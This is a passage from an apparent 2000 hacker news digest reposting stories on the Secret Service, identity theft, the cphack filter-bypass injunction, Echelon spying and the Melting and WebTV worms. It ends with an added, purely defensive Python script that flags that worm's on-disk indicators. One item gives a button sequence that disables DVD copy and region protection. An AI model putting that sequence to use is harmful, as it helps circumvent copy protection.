      subjected to nearly 17 months of imprisonment by the United States Secret 
      Service, agents of the USSS have again begun some kind of cat and mouse 
      game, the nature of which has yet to be revealed. 

      A Special Agent from the Secret Service showed up unannounced at 
      Bernie's workplace and told his employer they wanted to question Bernie, 
      who happened to be out sick that day. When Bernie returned to work the 
      following day and discovered the Secret Service wanted to talk to him, he 
      surprised the agent by calling him. What followed was an extremely strange 
      and circular conversation. 

      At first the SS agent wouldn't talk to him at all. Then he called 
      Bernie back and said they needed to talk with him at his home at 7am the 
      next morning. When Bernie explained he was just getting over a serious 
      illness and that this was an unreasonable hour, the agent suggested 6am. 
      Bernie repeatedly offered to answer their questions at several neutral 
      locations, but they said any place other than his home was unacceptable. 
      Bernie told them he had nothing to hide, but that he was not comfortable 
      having Secret Service agents poking around inside his house and that they 
      would have to get a warrant before he'd let them in. The agent then said 
      he had to go and would talk to him later. 

      About ten minutes later, a second, more polished, SS agent called 
      Bernie and continued trying to persuade him to let them inside his home. 
      The agent tried to goad Bernie by implying he must have something to hide, 
      and that if he didn't then there was no reason why they shouldn't be 
      allowed inside his home. At this point, Bernie tried to explain by saying 
      if you asked 100 people on the street if they'd want federal agents in 
      their living room and bedroom, almost everyone would say no and that he 
      was no exception. The SS agent disagreed, saying people have no legitimate 
      fears about such a visit. 

      Bernie repeatedly tried to get the SS agents to tell him what they 
      wanted. Finally, the second agent said, "I need to check to see if your 
      telephone and Cable TV wiring is hooked up properly." This preposterous 
      claim made Bernie actually laugh out loud. But as a further gesture of 
      cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV 
      technicians to inspect his house wiring for them. The SS agents said that, 
      too, would be unacceptable. It became clear the SS agents were simply 
      trying anything they could to get a foot in his door. Needless to say, 
      after Bernie's previous horrendous experience with the Secret Service, 
      their feet are not welcome in his home. He then gave them his attorney's 
      name and telephone number and told them to address future inquiries 
      directly to his lawyer. 

      So what is this all about? We don't know yet, but clearly something 
      is up. And the way the Secret Service has played sick games with people's 
      lives in the past, we felt it would be wise to alert everyone now so we 
      can all keep a closer eye on them before they try any further outrageous 
      actions under the veil of secrecy.

      @HWA
      
40.0  HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The U.S. Secret Service and Citicorp, a unit of New
      York-based Citigroup Inc., are working together to
      develop a pilot program to fight identity theft and other
      types of e-commerce fraud. The program will devise a
      strategy to identify suspicious e-commerce activities,
      including forged identities and other schemes used to
      commit bank and credit fraud. 

      Computer World
      http://www.computerworld.com/home/print.nsf/all/000316C9BE
      
      US Treasury Dept. - Press Release       
      http://www.ustreas.gov/press/releases/ps465.htm
      
      Computer World;
      
      
      Secret Service, Citicorp team to
      fight e-commerce fraud

      U.S. Treasury Department announces new initiatives to
      combat identity, other types of e-commerce fraud

      By Linda Rosencrance
      03/16/2000 The U.S. Secret Service and Citicorp, a unit of
      New York-based Citigroup Inc., are working together to
      develop a pilot program to fight identity theft and other
      types of e-commerce fraud, according to a statement
      issued by the U.S. Treasury Department. 

      The announcement was made at the two-day National
      Summit on Identity Theft convened by Treasury
      Secretary Lawrence H. Summers yesterday. The summit
      includes more than 150 participants from federal, state
      and local government agencies; financial institutions;
      credit-card companies and reporting agencies; as well
      as identity theft victims and consumer advocacy groups.

      "Criminals are exploiting new technologies to make a
      significant profit from an old crime," Summers said in
      the statement. "We will continue to work with the
      private sector to strengthen our efforts to combat this
      threat." 

      The program being developed by the Secret Service and
      Citicorp will devise a strategy to identify suspicious
      e-commerce activities, including forged identities and
      other schemes used to commit bank and credit fraud. 

      At yesterday's summit, Summers also said that the
      Secret Service is developing a computer-based training
      program to help law enforcement officials handle
      financial crimes. 
      
      -=-
      
      Press Release;
      
      TREASURY NEWS

      FROM THE OFFICE OF PUBLIC AFFAIRS

      FOR IMMEDIATE RELEASE
      March 15, 2000
      LS-465

      TREASURY CONVENES IDENTITY THEFT SUMMIT 

      Treasury Secretary Lawrence H. Summers convened a two-day National Summit 
      on Identity Theft today and announced four new initiatives targeted at 
      cracking down on the increasing threat of identity theft.

      "Criminals are exploiting new technologies to make a significant profit 
      from an old crime," said Treasury Secretary Summers. "We will continue to 
      work with the private sector to strengthen our efforts to combat this 
      threat."

      Called for last year by President Clinton, the Summit will address the 
      prevention of identity theft, remediation and enforcement efforts with the 
      public and private sector. The Summit will consist of a series of panels 
      and more than 150 participants from federal, state and local 
      government agencies, financial institutions, credit card companies and 
      reporting agencies, as well as identity theft victims, consumer advocacy 
      groups and private sector representatives.

      The four new Treasury initiatives to help combat identity theft include:

           Skimming and counterfeit check databases currently used to identify 
           common suspects, defendants of identity theft, and address criminal 
           trends prevalent in financial crimes today. These databases were 
           developed and are maintained by the U.S. Secret Service in 
           partnership with the financial industry;

           A computer-based training module developed by the U.S. Secret Service 
           that will focus on financial crimes and all pertinent statutes 
           including identity theft, and be made available within the agency as 
           well as local and state law enforcement officials 
           throughout the U.S.; 

           A pilot program, developed by the U.S. Secret Service and Citicorp, 
           to help identify suspicious activity on electronic commerce. The 
           program will attempt to develop a protocol for the identification of 
           identity theft and other schemes used to commit bank 
           fraud, credit fraud and money laundering within electronic commerce 
           and the immediate notification of law enforcement authorities; and 

           Forums and mini-conferences to maintain a dialogue between the 
           private and public sector.

      Treasury's National Summit on Identity Theft is the first national level
      conference involving law enforcement, victims, industry and nonprofits 
      interested in the issue.
      
      
      @HWA
            
41.0  HNN:Mar 17th:Computer History Lecture Series 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by McIntyre 
      The Computer Museum History Center, a non-profit
      entity dedicated to the preservation and celebration of
      computing history, will be having a lecture series
      entitled "Early Computer Crime". Speakers include
      Whitfield Diffie, John Markoff, Peter Neumann and Cliff
      Stoll. The Lecture will be held on Thursday, March 23,
      2000 at NASA Ames Research Center Auditorium,
      Moffett Field, Mountain View, CA. It is requested that
      RSVPs be received by Monday March 20. (Sounds like
      fun. I would like to cheer some of the speakers and heckle
      others.) 

      The Computer Museum      
      http://www.computerhistory.org/events/earlycrime_03232000/
      
      @HWA
      
42.0  HNN:Mar 17th: Australian Police To Increase Online Presence 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      Australian Federal Police Commissioner Mick Palmer said
      that in an effort to get better training for the people
      they already have and in an effort to attract more
      qualified applicants the Police will conduct a staff
      exchange with private industry. The commissioners will
      also establish an Electronic Crime Steering Committee to
      evaluate Australasia's capacity to fight electronic crime
      and will develop an Australasian Law Enforcement
      Electronic Crime Strategy by the end of June. 

      The Age 
      http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml
      
      Police to step up fight against e-crime

       Source: AAP | Published: Friday March 17, 3:38 PM 

       Police are set to recruit computer boffins in a bid to boost the fight 
       against so-called e-crime.

       The potential to commit crimes using computers and other information 
       technology was one of the greatest problems ever to face law enforcement, 
       Australian Federal Police Commissioner Mick Palmer said today.

       Speaking at the end of a week-long conference of police commissioners 
       from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner 
       Palmer said a staggering 900 million people would be using the Internet 
       by the end of this year.

       'People who abuse these technologies have the capacity to commit offences 
       on a global basis, with complete anonymity, with speed and on a scale not 
       previously encountered,' Commissioner Palmer told journalists.

       Credit card fraud, electronic vandalism, terrorism, electronic money 
       laundering and tax evasion are some examples of electronic crime.

       'The capacity of properly organised, electronic based crime to undermine 
       the financial stability of small and medium sized countries is very 
       real,' Commissioner Palmer said.

       A major problem for police is how to attract personnel with enough 
       technical expertise to fight this new crime.

       Commissioner Palmer said already police recruitment and selection was 
       becoming more flexible.

       'Clearly some of the technical skills that we are going to need ... come 
       at a very high cost,' he said.

       'People ... in that industry are earning a lot of money and that makes 
       the partnerships with business and the wider business community very 
       important.'

       Police will be looking to exchange staff with private industry to gain 
       the skills necessary, probably on short term, project based arrangements.

       Commissioner Palmer said discussions and negotiations had already begun 
       on this issue and Commonwealth Bank CEO David Murray addressed the 
       commissioners.

       'We will be recruiting people from the coalface for short periods of 
       time, we are going to be sharing resources between ourselves and the 
       wider partnership both in the private and public sense.'

       The commissioners agreed to establish an Electronic Crime Steering 
       Committee to evaluate Australasia's capacity to fight electronic crime.

       It will develop an Australasian Law Enforcement Electronic Crime Strategy 
       by the end of June.
      
      
      
      @HWA


43.0  HNN:Mar 17th:Apex DVD Defeats Region and Macrovision 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Sciri 
      Hot on the heels of the PlayStation2 being able to play
      Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3
      player that can disable CSS, Region and Macrovision
      settings after entering a simple code (Preferences ->
      Step -> Prev Track -> Next Track). 

      Review of the Apex-600A
      http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3
      
      Nerd Out       
      http://www.nerd-out.com/
      
      @HWA
      
      
     
44.0  HNN:Mar 20th:First Malicious Code Directed at WebTV 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

      From HNN http://www.hackernews.com/
      
      contributed by Hal0 
      Microsoft is working on a patch to its service to
      counteract malicious programming code that overloads
      WebTV newsgroup discussions with fake postings. While
      the code self-replicates like a virus, Microsoft insists
      on calling it "malicious code" rather than a virus. The
      code appends itself to a WebTV user's signature file and
      then cross-posts itself to numerous newsgroups. 

      Wired 
      http://www.wired.com/news/technology/0,1282,35045,00.html
      
      WebTV's 'Non-Virus' Virus 
      by Chris Oakes 

      3:00 a.m. Mar. 18, 2000 PST             

      Although it prefers to call the trouble a "malicious code," WebTV has 
      experienced its first virus. Parent company Microsoft is working on 
      a patch of its service to counteract malicious programming code that 
      overloads WebTV newsgroup discussions with fake postings. 

      "Newsgroups are starting to flood with junk posts, and you can't post," 
      said Brian Bock, editor-in-chief of Net4TV Voice, an online publication 
      focusing on Internet services via television. WebTV users first reported 
      the problem to Net4TV. 

      Bock said the virus -- a first for the closed, non-PC WebTV system -- is 
      like the renowned PC virus Melissa. The similarity is that it 
      self-replicates, he said. But this virus does it by altering signatures 
      that appear at the bottom of WebTV user's Usenet messages. 

      "When another WebTV user runs across [an infected message], it writes the 
      virus into their email signature," he said. "Then when they go make a 
      Usenet posting, it cross-posts. They end up posting to a whole bunch of 
      different news groups." 

      The result is the multiplication of junk messages in discussion forums 
      until discussions are disrupted completely because the system's maximum 
      number of viewable messages is reached. 

      Microsoft was extremely reluctant to call the problem a virus. "It's not a 
      virus," said Microsoft spokeswoman Claire Haggard. "There's never been a 
      virus on WebTV." 

      Then what is it? 

      Haggard said the problem was malicious code in WebTV's Usenet posting 
      system. 

      The company took issue with the description of the code as 
      "self-replicating," saying it had to be "manually" inserted in Usenet 
      posts and didn't self-replicate. Furthermore, Haggard said the multiplying 
      Usenet messages did not involve the exploitation of a user's signature. 

      Bock said the virus does make use of an existing flaw in the service's 
      email system. That hole is exploited along with a WebTV code for posting 
      messages, Bock said. 

      The issues are separate, Haggard said. 

      In any case, the problem gets awfully close to meeting the conventional 
      definition of virus: a malicious code that, once installed, performs 
      usually undesirable tasks on the victim's computer. 

      In most technical definitions, self-replication is not a prerequisite, 
      although the Merriam-Webster definition of virus does include 
      self-replication: "A computer program usually hidden within another 
      seemingly innocuous program that produces copies of itself." 

      Virus or not, manual or self-replicating, the malicious code will be 
      patched, hopefully by next week, the company said. Meanwhile, WebTV will 
      be removing the junk posts. Haggard said the company has only heard from 
      14 users inquiring about the problem. 

      She said the company plans a regular update of its client and server 
      software soon, and that "the upgrade will be made immune from such hacker 
      problems." 

      
      @HWA


45.0  HNN:Mar 20th:Liberia Claims Attack In CyberWar 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      President Charles Taylor of Liberia has claimed that his
      country is under attack in a cyber war but failed to say
      by whom. He made the statement after his government
      shut down two independent radio stations and their
      related web sites. Amnesty International and the US
      State Department have vigorously protested the station
      closings. 

      Wired 
      http://www.wired.com/news/politics/0,1283,35016,00.html

     'Cyber War' in Liberia 
      Reuters 

      7:00 a.m. Mar. 17, 2000 PST      

      MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of 
      the government's closure of two radio stations, said a "cyber war" had 
      been declared on his country. 

      "A cyber war has been declared on Liberia and the government is doing 
      everything possible to fight back," he said on Thursday at his Executive 
      Mansion after signing into law seven bills. 

      
      He did not say who was waging this war. 

      Star, an independent radio station that was closed down on Wednesday, had 
      an Internet news service popular with Liberians abroad that was also 
      closed. 

      The government justified the closures by saying that "agents provocateurs" 
      were using the news media, especially radio stations, to create security 
      problems. 

      "The government took the action to prevent an outbreak of another war 
      which could be caused by negative broadcasts to create hatred among the 
      Liberian people through hate messages," Taylor said. 

      Taylor's election in 1997 formally ended a civil war that he started in 
      December 1989. 

      The U.S. government joined human rights groups, local media, and the Press 
      Union of Liberia in protesting against the closures. 

      "The United States vigorously protests the unwarranted closure of these 
      two radio stations and calls on the Government of Liberia to reopen them 
      immediately, without conditions, and to return the confiscated equipment," 
      the U.S. State Department said in a statement. 

      Rights group Amnesty International has linked the closure of Star to a 
      March 13 broadcast it made about a U.S. State Department report on human 
      rights in Liberia. 

      Star was established in 1997 by the Hirondelle Foundation, a Swiss-based 
      non-governmental organization, with the help of the United States Agency 
      for International Development. 

      The second station, Radio Veritas, is run by the Roman Catholic Church. 
      The government suspended the station but said it could start operating 
      again if it provided a written assurance it would broadcast only religious 
      material. 

      The Catholic Archbishop of Monrovia said Veritas had a constitutional 
      right to broadcast. 

      "It is our constitutional right to disseminate information to the public 
      and if we abuse the right, let the courts deal with us, not the 
      executive," Archbishop Michael Kpakala Francis said in a statement 
      released late on Thursday. 

      "We will not give any commitment to the government of Liberia that will 
      restrict us to religious programs," he added, denying that Veritas' 
      license restricted it to religious broadcasts. 

      
      @HWA


46.0  HNN:Mar 20th:Judge Bans Anti-Filter Software 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Aj 
      U.S. District Judge Edward F. Harrington has granted an
      injunction requested by Microsystems Software Inc. to
      prevent distribution of cphack. cphack was designed to
      bypass the surfing restrictions used by CyberPatrol as
      well as list every web site blocked by the software. The
      Judge's decision effectively blocks anyone from
      distributing the software. There were no defendants
      present at the hearing; the next hearing is scheduled for
      March 27th. (This could be a rather serious threat to
      peoples' right to reverse engineer and to even write
      software.) 

      MSNBC
      http://www.msnbc.com/news/383603.asp
      
      Associated Press - via Washington Post 
      http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm
      
      Porn Software Injunction Issued 

      By Martin Finucane
      Associated Press Writer
      Friday, March 17, 2000; 1:33 p.m. EST

      BOSTON -- A federal judge Friday ordered a halt to the distribution of
      a computer program that allows children to bypass software designed to
      keep them away from Internet pornography. 

      Microsystems Software Inc. of Framingham, which sells the widely used
      "Cyber Patrol" filtering software, sued two computer experts who
      distributed the bypassing software via the Internet. The software, called
      "cphack," also discloses a list of sites that are blocked by the Cyber Patrol
      program. 

      U.S. District Judge Edward F. Harrington ordered Matthew Skala, a
      self-described cryptography buff who attends the University of Victoria in
      British Columbia, and Eddy L.O. Jansson, believed to be living in
      Sweden, to stop spreading the "cphack" program. 

      The judge also blocked distribution of the "cphack" software by anyone
      working with them. 

      Microsystems attorney Irwin Schwartz said the judge's order extended to
      any "mirror" Web sites, where the program may have been copied and
      made available. Another hearing is set for March 27 on the case. 

      Skala and Jansson were not represented at Friday's hearing, and they did
      not immediately return e-mails seeking comment. 

      Microsystems has said in its legal filings it would suffer "irreparable harm"
      from the publication of the bypassing software, which it said sought to
      destroy the market for its product by rendering it ineffective. 

      "The practical effect is that ... children may bypass their parents' efforts to
      screen out inappropriate materials on the Internet," according to the filing
      made this week. 

      Free speech advocates criticized the company's move to block
      distribution of the software. 

      Peter Junger, a law professor at Case Western Reserve University in
      Cleveland and an advocate of free speech on the Internet, said it "looks
      like a rather horrifying challenge to people's right to write software" and to
      "reverse-engineer" software, which means figure out how it works. 

      "The idea that one can prevent reverse-engineering of software and
      publishing the results of that reverse-engineering strikes me as a very
      dangerous restriction on free speech," he said before the judge's ruling. 

      Chris Hansen, a senior lawyer with the national office of the American
      Civil Liberties Union, said there might be debate about whether
      distributing the bypass software was legal, but that the ACLU agreed with
      at least one role of the software -- publicizing the list of blocked sites. 

      "Parents who want to install these products ought to be able to do so," he
      said, adding, "How can you, as a parent, make an intelligent decision (on
      filtering software)if the product won't tell you what they're blocking?" 

                   (c) Copyright 2000 The Associated Press 

      
      
      @HWA
      

47.0  HNN:Mar 20th:We Spy To Prevent Bribes 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by Weld Pond 
      A former Director of Central Intelligence, R. James
      Woolsey, has written a story about why the United
      States spies on its allies. The primary reason given is to
      prevent bribery so that US companies can compete on
      an even playing field. (Sorry but I don't buy it, that is
      too much power for such a simple purpose but I guess
      the ends justify the means for the US Government. So
      why can't US citizens spy on their own government to
      make sure they are complying with the law? Where are
      the checks and balances?) 

      Wall Street Journal - via Cryptome 
      http://cryptome.org/echelon-cia2.htm
      
      17 March 2000. Thanks to DB. 

      We look forward to seeing and hearing James Woolsey and Duncan Campbell 
      openly debate this controversy, in Congressional hearings, on global TV, 
      the Internet, MilNet and IntelNet -- and all the Echelon surveillance 
      stations based in countries of those who "can't compete with the US." 

      See transcript of Woolsey's March 7 remarks on economic espionage to the 
      Foreign Press Center: http://cryptome.org/echelon-cia.htm 

      

      The Wall Street Journal, March 17, 2000 

      Why We Spy on Our Allies 

      By R. James Woolsey, a Washington lawyer and a former Director of Central 
      Intelligence. 

      What is the recent flap regarding Echelon and U.S. spying on European 
      industries all about? We'll begin with some candor from the American side. 
      Yes, my continental European friends, we have spied on you. And it's true 
      that we use computers to sort through data by using keywords. Have 
      you stopped to ask yourselves what we're looking for? 

      The European Parliament's recent report on Echelon, written by British 
      journalist Duncan Campbell, has sparked angry accusations from continental 
      Europe that U.S. intelligence is stealing advanced technology from 
      European companies so that we can -- get this -- give it to American 
      companies and help them compete. My European friends, get real. True, in a 
      handful of areas European technology surpasses American, but, to say this 
      as gently as I can, the number of such areas is very, very, very small. 
      Most European technology just isn't worth our stealing. 

      Why, then, have we spied on you? The answer is quite apparent from the 
      Campbell report -- in the discussion of the only two cases in which 
      European companies have allegedly been targets of American secret 
      intelligence collection. Of Thomson-CSF, the report says: "The 
      company was alleged to have bribed members of the Brazilian government 
      selection panel." Of Airbus, it says that we found that "Airbus agents 
      were offering bribes to a Saudi official." These facts are inevitably left 
      out of European press reports. 

      That's right, my continental friends, we have spied on you because you 
      bribe. Your companies' products are often more costly, less technically 
      advanced or both, than your American competitors'. As a result you bribe a 
      lot. So complicit are your governments that in several European 
      countries bribes still are tax-deductible. 

      When we have caught you at it, you might be interested, we haven't said a 
      word to the U.S. companies in the competition. Instead we go to the 
      government you're bribing and tell its officials that we don't take kindly 
      to such corruption. They often respond by giving the most 
      meritorious bid (sometimes American, sometimes not) all or part of the 
      contract. This upsets you, and sometimes creates recriminations between 
      your bribers and the other country's bribees, and this occasionally 
      becomes a public scandal. We love it. 

      Why do you bribe? It's not because your companies are inherently more 
      corrupt. Nor is it because you are inherently less talented at technology. 
      It is because your economic patron saint is still Jean Baptiste Colbert, 
      whereas ours is Adam Smith. In spite of a few recent reforms, your 
      governments largely still dominate your economies, so you have much 
      greater difficulty than we in innovating, encouraging labor mobility, 
      reducing costs, attracting capital to fast-moving young businesses and 
      adapting quickly to changing economic circumstances. You'd rather not go 
      through the hassle of moving toward less dirigisme. It's so much easier to 
      keep paying bribes. 

      The Central Intelligence Agency collects other economic intelligence, but 
      the vast majority of it is not stolen secrets. The Aspin-Brown Commission 
      four years ago found that about 95% of U.S. economic intelligence comes 
      from open sources. 

      The Campbell report describes a sinister-sounding U.S. meeting in 
      Washington where -- shudder! -- CIA personnel are present and the 
      participants -- brace yourself -- "identify major contracts open for bid" 
      in Indonesia. Mr. Campbell, I suppose, imagines something like this: 
      A crafty CIA spy steals stealthily out of a safe house, changes disguises, 
      checks to make sure he's not under surveillance, coordinates with a spy 
      satellite and . . . buys an Indonesian newspaper. If you Europeans really 
      think we go to such absurd lengths to obtain publicly available 
      information, why don't you just laugh at us instead of getting in high 
      dudgeon? 

      What are the economic secrets, in addition to bribery attempts, that we 
      have conducted espionage to obtain? One example is some companies' efforts 
      to conceal the transfer of dual-use technology. We follow sales of 
      supercomputers and certain chemicals closely, because they can be 
      used not only for commercial purposes but for the production of weapons of 
      mass destruction. Another is economic activity in countries subject to 
      sanctions -- Serbian banking, Iraqi oil smuggling. 

      But do we collect or even sort secret intelligence for the benefit of 
      specific American companies? Even Mr. Campbell admits that we don't, 
      although he can't bring himself to say so except with a double negative: 
      "In general this is not incorrect." The Aspin-Brown Commission was 
      more explicit: "U.S. Intelligence Agencies are not tasked to engage in 
      'industrial espionage' -- i.e. obtaining trade secrets for the benefit of 
      a U.S. company or companies." 

      The French government is forming a commission to look into all this. I 
      hope the commissioners come to Washington. We should organize two seminars 
      for them. One would cover our Foreign Corrupt Practices Act, and how we 
      use it, quite effectively, to discourage U.S. companies from bribing 
      foreign governments. A second would cover why Adam Smith is a better guide 
      than Colbert for 21st-century economies. Then we could move on to 
      industrial espionage, and our visitors could explain, if they can keep 
      straight faces, that they don't engage in it. Will the next commission 
      pursue the issue of rude American maitre d's? 

      Get serious, Europeans. Stop blaming us and reform your own statist 
      economic policies. Then your companies can become more efficient and 
      innovative, and they won't need to resort to bribery to compete. 

      And then we won't need to spy on you. 

      
      
      @HWA


48.0  HNN:Mar 20th:LAPD Tells Parody Site To Chill 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Rho 
      The Computer Crimes Division of the L.A. County
      Sheriff's Department has forced
      www.fortheloveofjulie.com to alter its content. Fearing
      that the fake stalking site was a little too real and that
      it could hamper probes of real crimes they strongly
      suggested that the owner make changes to the site or
      take it down. The site is meant to be entertaining and
      spooky similar to 'The Blair Witch Project'. 

      CNN 
      http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html
      
      Authorities tell faux-stalker
      site to tone it down 
 
      March 17, 2000
      Web posted at: 8:46 p.m. EST (0146 GMT)
 
      By D. Ian Hopper
      CNN Interactive Technology Editor
 
      (CNN) -- After getting over 2 million
      page views, the authors of a
      faux-stalker site got a call from
      someone who wasn't such a fan -- a
      police detective. 
 
      A detective from the Computer
      Crimes Division of the L.A. County Sheriff's Department contacted Spark
      Factory president Tim Street Friday. According to authorities, the detective
      strongly suggested that Street take down FortheloveofJulie.com, a fake
      stalker site that aims to be an entertaining but spooky story in the tradition of
      last year's "The Blair Witch Project" phenomenon. 
 
      The site is a shrine to "Julie" from her admirer, a video-store clerk who
      follows her home and to her work, taking videos and posting a journal
      complete with movie clips and pictures. 
 
      The site has become very popular, Street says,
      through both word-of-mouth and media
      attention. While it's completely fake, many users
      failed to see a disclaimer because they're going
      through a publicized back door that bypasses
      SpookySites.com, where it's indexed. 
 
      SpookySites contains a small disclaimer upon entering the site that informs
      users that the content within "may contain fictionalization." 
 
      But like many others, the detective entered the site through a back door,
      missing the disclaimer. When he called Street, the site's author was skeptical.
 
      "He told me he was with the police department. I wanted to call him back to
      make sure, because practical jokes around here are running rampant," Street
      said. "One guy here said he was from the FBI." 
 
      "We received a tip from an investigator on the East Coast," says Sgt. Larry
      Balich. 
 
      Authorities found a photo in the site that clearly showed a vehicle and license
      plate, and traced it back to Street. 
 
      "We thought we had a stalking situation on our hands," Balich says. "But we
      needed a victim. You can't investigate a case without a victim or witness,
      and we had neither." 
 
                                   After contacting the district attorney's
                                   office, detectives found that no crime
                                   had been committed. Still, Street says,
                                   police "strongly suggested" that he
                                   take the site down or close the back
                                   door and make the disclaimer more
                                   obvious. 
 
                                   "We're going to frame it inside
                                   CreepySites," Street said. "We'll have
                                   a bolder disclaimer that says
                                   FortheloveofJulie is fictitious, and Julie
      is not in any danger." 
 
      "We don't think we have to," he says, "but we don't want to have any
      problems." 
 
      Balich says the site was just a little too real and could hamper probes of real
      crimes. 
 
      "It's troublesome to have something like this on the Internet," Balich says. "I
      consider it a misuse of a real positive thing." 
 
      The site was taken down for most of the day but came back up in the
      afternoon with the intended changes. 
 
      Street says he made the site as an "Internet soap opera" meant to entertain
      users who were in for a suspenseful thrill. 
 
      "It's not our intent to be evil, creepy people," he says. "We're trying to
      showcase how this new experience can change entertainment on the
      Internet." 
 
      Street says he has already left a message with the FBI to try to head off any
      more misunderstandings. 
      
      
      @HWA


49.0  HNN:Mar 20th:New Windows Worm Virus 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      A new worm that can shut down MS Windows platforms
      and leave the operating system unusable has been
      discovered by Computer Associates International. Once
      launched via MS Outlook under Windows 95, 98, 2000 or
      NT, Win32/Melting.Worm copies itself into the Windows
      directory under the name MeltingScreen.exe, mails itself
      to the victim's Outlook address book, and renames the
      .exe files in the Windows directory to .bin. 

      PC World 
      http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html
      

      Windows 'Worm' Virus
      Slithers 

      Computer Associates identifies virus that travels
      through Outlook. 

      by Kathleen Ohlson, Computerworld 
      March 17, 2000, 6:56 a.m. PT 

      A new worm now "in the wild" has the potential to shut
      down Windows platforms and make the operating
      system permanently unusable.

      Computer Associates International discovered the
      worm, Win32/Melting.worm, on Tuesday, when
      customers started to find it in their e-mail systems,
      says Narender Mangalam, director of security solutions
      at CA. So far, it has hit some Fortune 1000 software
      companies, he says.

      "The risk level is moderate, and it hasn't caused too
      much damage because we believe we've caught it in
      time," Mangalam says. CA markets InoculateIT, a virus
      detection and prevention program.

      The Melting Worm is unleashed through Microsoft's
      Outlook running on Windows 95, 98, 2000, or NT,
      according to CA representatives. Once launched, the
      worm puts a copy of itself into a Windows directory as
      MeltingScreen.exe and remains in memory. Files with
      .exe extensions in a system's Windows directory are
      renamed with .bin extensions.

      As the worm renames files, including ones critical to
      operating Windows, these changes may render the
      operating system useless.

      The worm also starts to e-mail itself to all the names in
      a victim's Outlook address book and randomly
      executes other .exe files, Mangalam says. This
      potentially can take down a company's e-mail system.
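
      The article gives two on-disk indicators for this worm: a copy named
      MeltingScreen.exe in the Windows directory, and .exe files in that
      directory renamed to .bin. Since the renamed files are the original
      executables with only the extension changed, they still begin with
      the PE "MZ" header, which is what separates them from genuine .bin
      data files. The following triage script is an added example written
      for this issue; it is not code from the article, from Computer
      Associates or from InoculateIT. The file names come from the article;
      the MZ-header check, the dry-run restore logic and the sample
      directory it builds are assumptions made here for illustration. It
      scans only the directory it is given and never touches mail or the
      network.

```python
"""Triage helper for the Win32/Melting.worm indicators described above.

Added example, not from the article or from Computer Associates. It looks
for the two on-disk indicators the article gives: a file named
MeltingScreen.exe in the Windows directory, and programs there that have
been renamed from .exe to .bin. The renamed files still start with the
PE 'MZ' header, so a .bin that begins with MZ is treated as a renamed
executable (assumption made for this example, not stated by the article).
"""
import os
import tempfile

WORM_DROP_NAME = "meltingscreen.exe"   # name the worm uses for its copy (from the article)
PE_MAGIC = b"MZ"                       # DOS/PE executable header magic


def is_pe_file(path):
    """Return True if the file starts with the 'MZ' executable header."""
    try:
        with open(path, "rb") as f:
            return f.read(2) == PE_MAGIC
    except OSError:
        return False


def scan_windows_dir(windir):
    """Scan one directory (non-recursive: the article only names the Windows
    directory) and return a dict with two lists of paths:
      'dropper'  - files whose name matches MeltingScreen.exe
      'renamed'  - .bin files carrying a PE header, i.e. renamed .exe files
    """
    found = {"dropper": [], "renamed": []}
    for name in sorted(os.listdir(windir)):
        path = os.path.join(windir, name)
        if not os.path.isfile(path):
            continue
        lower = name.lower()
        if lower == WORM_DROP_NAME:
            found["dropper"].append(path)
        elif lower.endswith(".bin") and is_pe_file(path):
            found["renamed"].append(path)
    return found


def restore_renamed(paths, dry_run=True):
    """Rename <name>.bin back to <name>.exe and return (old, new) pairs.
    With dry_run=True nothing on disk changes. A .bin is skipped when the
    .exe already exists, so nothing is ever overwritten."""
    done = []
    for old in paths:
        new = old[:-4] + ".exe"
        if os.path.exists(new):
            continue
        if not dry_run:
            os.rename(old, new)
        done.append((old, new))
    return done


def build_sample_dir():
    """Construct a throwaway directory that mimics an infected Windows
    directory. Sample data constructed for this example only."""
    d = tempfile.mkdtemp(prefix="melting_demo_")
    # renamed executables: PE header intact, extension changed to .bin
    for n in ("notepad.bin", "regedit.bin"):
        with open(os.path.join(d, n), "wb") as f:
            f.write(b"MZ\x90\x00" + b"\x00" * 60)
    # a genuine .bin data file: no PE header, must not be flagged
    with open(os.path.join(d, "fonts.bin"), "wb") as f:
        f.write(b"\x00\x01\x02\x03")
    # the worm's own dropped copy
    with open(os.path.join(d, "MeltingScreen.exe"), "wb") as f:
        f.write(b"MZ\x90\x00" + b"\x00" * 60)
    return d


if __name__ == "__main__":
    demo = build_sample_dir()
    hits = scan_windows_dir(demo)
    print("dropper:", hits["dropper"])
    print("renamed:", hits["renamed"])
    for old, new in restore_renamed(hits["renamed"], dry_run=True):
        print("would rename", old, "->", new)
```

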